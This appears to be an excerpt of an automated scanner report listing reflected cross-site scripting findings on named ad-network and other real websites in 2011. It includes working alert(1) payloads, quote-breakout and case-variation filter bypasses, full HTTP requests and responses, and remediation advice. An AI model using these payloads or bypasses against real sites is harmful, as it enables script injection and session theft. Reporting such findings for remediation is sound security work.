This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39203%3balert(1)//7c31c657ad7 was submitted in the callback parameter. This input was echoed as 39203;alert(1)//7c31c657ad7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5a4d3<script>alert(1)</script>798bcc7a568 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload e4004<script>alert(1)</script>f95237046cf was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ccca6<script>alert(1)</script>b631027d26d was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 16faf<script>alert(1)</script>25da9310260 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 9af12<script>alert(1)</script>c3b46f05e43 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 91d0b<script>alert(1)</script>b9789a4c38 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload b2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce was submitted in the iplc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload a6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829 was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c was submitted in the zi parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57523'%3balert(1)//761ebfa4333 was submitted in the $ parameter. This input was echoed as 57523';alert(1)//761ebfa4333 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=951:collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=91:90:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "aa1b9a-8952-4accb58ae5040" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=18 Expires: Sat, 17 Sep 2011 01:50:08 GMT Date: Sat, 17 Sep 2011 01:49:50 GMT Content-Length: 2676 Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c'';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cd0e"-alert(1)-"31d922bac00 was submitted in the $ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=951:collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=89:88:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "aa1b9a-8952-4accb58ae5040" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=18 Expires: Sat, 17 Sep 2011 01:50:08 GMT Date: Sat, 17 Sep 2011 01:49:50 GMT Content-Length: 2754 Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082"';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82c2'%3balert(1)//7d572232822 was submitted in the q parameter. This input was echoed as c82c2';alert(1)//7d572232822 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'$0:collective728x90;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=77:76:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "aa1b9a-8952-4accb58ae5040" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=23 Expires: Sat, 17 Sep 2011 01:50:08 GMT Date: Sat, 17 Sep 2011 01:49:45 GMT Content-Length: 2750 Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='c82c2';alert(1)//7d572232822,284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=c82c2';alert(1)//7d572232822,284b8'-alert(1)-'0 ...[SNIP]...
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 569f5<script>alert(1)</script>cbb22875fc7 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1f4"-alert(1)-"f4229a086fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7A00B96A0D964F453E5BD8D5810F10FB; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:07:59 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2023a"-alert(1)-"ff30b4aa7a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A971275997FA7630761B5092947B1A05; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:08:00 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db706"-alert(1)-"9cd6414e8aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A049BAB0531C29E6EC384F93AA842C69; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:08:00 GMT Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 114c3"-alert(1)-"fc47482de42 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=1DB5C21D80F320C04F41B642CF20125A; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:08:01 GMT Connection: close
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b6a7"-alert(1)-"c3bd8bd988d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=1DCCDAFA24DD21FDF6463237374426AC; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:08:02 GMT Connection: close
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 640d2"-alert(1)-"0338569564a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6B61580EFD1DC69FFF19E25E19111CA1; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:08:01 GMT Connection: close
4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77df7"-alert(1)-"55e8aaf402d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=81D38C248A8FC0D3AE4AEA54D3D89A0E; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:07:58 GMT Connection: close
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6da0d"-alert(1)-"9d189a7cf3d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=85A39D4B6E9886329A268FD24420D20D; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:07:58 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 64628<script>alert(1)</script>adbac286e48 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/get?callback=GUMGUM.startServices64628<script>alert(1)</script>adbac286e48&_=1316238826949&pubdata={%22t%22:%22tmzdtcom%22,%22v%22:1,%22r%22:%229926v3%22,%22rf%22:%22%22} HTTP/1.1 Host: g2.gumgum.com Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19be'%3balert(1)//63b277fa96a was submitted in the redir parameter. This input was echoed as a19be';alert(1)//63b277fa96a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 36dcc<script>alert(1)</script>39a607c6ef6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the clicktracking request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c993b"-alert(1)-"79e3f04e7ed was submitted in the clicktracking parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imp.fetchback.com
Path:
/serve/fb/adtag.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5581f"-alert(1)-"11bcd5d0490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95638"-alert(1)-"4bc29a81874 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jcp.org
Path:
/en/jsr/all
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284c1"><script>alert(1)</script>451b1e39851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1 HTTP/1.1 Host: jcp.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
The value of the ali request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea4cb'%3balert(1)//4b86e2820c was submitted in the ali parameter. This input was echoed as ea4cb';alert(1)//4b86e2820c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe30b'%3balert(1)//803e9c23130 was submitted in the cid parameter. This input was echoed as fe30b';alert(1)//803e9c23130 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the clen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31fab'%3balert(1)//0fad37552c8 was submitted in the clen parameter. This input was echoed as 31fab';alert(1)//0fad37552c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 7ec98<script>alert(1)</script>b1efe77bc87 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91982'%3balert(1)//e1948788f29 was submitted in the p parameter. This input was echoed as 91982';alert(1)//e1948788f29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b443'%3balert(1)//a35e45272ee was submitted in the pid parameter. This input was echoed as 5b443';alert(1)//a35e45272ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pli request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61d4e'%3balert(1)//bb7df706fb4 was submitted in the pli parameter. This input was echoed as 61d4e';alert(1)//bb7df706fb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce66b'%3balert(1)//a655a638949 was submitted in the ref parameter. This input was echoed as ce66b';alert(1)//a655a638949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbb14'%3balert(1)//5c7df914983 was submitted in the sid parameter. This input was echoed as fbb14';alert(1)//5c7df914983 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ver request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31763'%3balert(1)//9a116341702 was submitted in the ver parameter. This input was echoed as 31763';alert(1)//9a116341702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69e1a'%3balert(1)//d8a16318306 was submitted in the vid parameter. This input was echoed as 69e1a';alert(1)//d8a16318306 in the application's response.
